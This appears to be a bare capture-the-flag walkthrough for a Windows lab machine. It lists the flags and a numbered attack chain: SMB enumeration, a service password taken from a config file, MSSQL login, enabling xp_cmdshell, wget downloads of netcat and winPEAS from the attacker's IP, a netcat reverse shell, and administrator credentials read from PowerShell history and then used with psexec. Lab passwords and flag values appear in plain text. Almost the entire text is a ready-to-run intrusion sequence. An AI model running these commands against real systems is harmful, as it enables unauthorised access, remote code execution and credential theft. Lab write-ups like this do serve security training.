Target IP: 10.129.95.187 

Attacking IP: 10.10.14.115


User flag:
3e7b102e78218e935bf3f4951fec21a3

Root flag:
b91ccec3305e98240082d4474b848528


Steps:
1. nmap -sV -p- 10.129.95.187
2. smbclient -L \\\\10.129.95.187
3. smbclient \\\\10.129.95.187\\backups
4. get prod.dtsConfig
5. Password =M3g4c0rp123
   ID = ARCHETYPE\sql_svc
6.  impacket-mssqlclient -windows-auth  ARCHETYPE/sql_svc:M3g4c0rp123@10.129.95.187
7. EXEC sp_configure 'show advanced options' ,1
8. reconfigure
9. EXEC sp_configure 'xp_cmdshell' , 1
10. reconfigure
11. Start a python server

12. EXEC xp_cmdshell 'powershell -c cd C:/Users/sql_svc/Downloads; wget http://10.10.14.115:8888/nc64.exe -o nc64.exe'

13. EXEC xp_cmdshell 'powershell -c cd C:/Users/sql_svc/Downloads; wget http://10.10.14.115:8888/winPEASx64.exe -o winPEASx64.exe'


14. nc -lvnp 1261

15. EXEC xp_cmdshell 'powershell -c cd C:/Users/sql_svc/Downloads; ./nc64.exe -e cmd.exe 10.10.14.115 1261'

16. powershell

17. cat C:\Users\sql_Svc\Desktop\user.txt

18. cat C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine\ConsoleHost_history.txt

    user:administrator pass:MEGACORP_4dm1n!!

19. impacket-psexec administrator@10.129.95.187
20. powershell
21. cat C:\Users\Administrator\Desktop\root.txt


